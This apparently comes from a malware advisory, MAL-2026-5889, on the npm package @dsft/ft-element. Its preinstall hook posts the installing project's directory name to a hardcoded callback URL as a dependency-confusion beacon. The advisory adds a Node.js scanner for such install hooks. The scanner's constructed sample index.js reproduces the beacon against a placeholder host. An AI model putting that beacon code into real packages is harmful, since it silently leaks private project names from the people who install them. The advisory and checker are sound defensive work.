
MAL-2026-5889

Malicious code in @dsft/ft-element (npm)

Details


## Source: amazon-inspector (7a7ba80413e901c3cf618c92bd61dc6942bf167fac46b0dc7c554a4a06f705c1)

On `npm install`, the package's preinstall hook (`preinstall: node index.js` in package.json) executes index.js, which reads `process.env.INIT_CWD`, derives the installing project's directory name via `path.basename()`, and POSTs a JSON beacon `{pkg, timestamp, transport, project}` to a hardcoded callback URL `https://deepbounty.dd06-dev.fr/cb/e51c2215-3fa8-48f1-ad64-1cf792e0cccc`. The package is published under the `@dsft` scope and self-describes as a dependency-confusion PoC (`description: Security PoC for Bug Bounty`; index.js comment: `Harmless dependency confusion PoC`). Any build pipeline that expects a private `@dsft/ft-element` package and resolves to this public version will silently leak the project's directory name — which typically equals the private package/repo name — to a third-party endpoint, confirming a successful dependency-confusion takeover target. Installers receive no disclosure or consent. Although the author frames this as harmless research, the mechanism (unconditional install-time beacon containing host-identifying context to an attacker-controlled URL) is a supply-chain attack against any installer the scope collision affects.
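The pattern described above (an install lifecycle hook that reads the installing project's context and sends it to a remote URL) can be checked for before a package is trusted. The following Node.js checker is an added example, not code from the advisory, the package or its author; the package.json and index.js it inspects are constructed in memory to mirror the description, and the callback URL in the sample is a placeholder.

```javascript
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators taken from the advisory: the hook reads install context (INIT_CWD) and calls out to a hardcoded URL.
const HOST_CONTEXT_RE = /process\.env\.INIT_CWD|process\.cwd\(\)|os\.hostname\(\)/;
const NETWORK_RE = /\b(?:https?\.request|fetch|axios\.post)\s*\(/;
const URL_RE = /https?:\/\/[^\s'"`)]+/g;

// Lifecycle hooks that run automatically during `npm install`, with their commands.
function installHooks(pkgJson) {
  const scripts = (pkgJson && pkgJson.scripts) || {};
  return LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === 'string')
    .map((h) => ({ hook: h, cmd: scripts[h] }));
}

// Resolve `node <file>` to the file the hook executes; other commands stay opaque.
function hookScriptFile(cmd) {
  const m = cmd.trim().match(/^node\s+(\S+)\s*$/);
  return m ? m[1] : null;
}

// Assess one package. `files` maps file names inside the package to their contents
// (a real scan would read them from the unpacked tarball or node_modules directory).
function assessPackage(pkgJson, files) {
  const findings = [];
  for (const { hook, cmd } of installHooks(pkgJson)) {
    const file = hookScriptFile(cmd);
    const src = file && typeof files[file] === 'string' ? files[file] : '';
    const readsHostContext = HOST_CONTEXT_RE.test(src);
    const urls = src.match(URL_RE) || [];
    const makesNetworkCall = NETWORK_RE.test(src) || urls.length > 0;
    let verdict = 'review'; // has an install hook; inspect before trusting
    if (!file) verdict = 'opaque-hook'; // shell command that was not resolved to a file
    else if (readsHostContext && makesNetworkCall) verdict = 'install-beacon';
    findings.push({ hook, cmd, file, readsHostContext, makesNetworkCall, urls, verdict });
  }
  return findings;
}

// Constructed sample mirroring the advisory's description; not the real package contents.
const SAMPLE_PKG = { name: '@dsft/ft-element', scripts: { preinstall: 'node index.js' } };
const SAMPLE_FILES = {
  'index.js': [
    "const https = require('https'), path = require('path');",
    "const project = path.basename(process.env.INIT_CWD || '');",
    "const body = JSON.stringify({ pkg: '@dsft/ft-element', project });",
    "https.request('https://callback.example.invalid/cb/PLACEHOLDER', { method: 'POST' }).end(body);",
  ].join('\n'),
};
console.log(JSON.stringify(assessPackage(SAMPLE_PKG, SAMPLE_FILES), null, 2));
```

Running `npm install --ignore-scripts` (or setting `ignore-scripts=true` in .npmrc) prevents such hooks from executing at all, and a scope-to-registry mapping for `@dsft` in .npmrc keeps the private name from resolving to the public registry.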


Affected packages

npm / @dsft/ft-element

No fixed version published yet for @dsft/ft-element (npm). Pin to a known-safe version or switch to an alternative.

References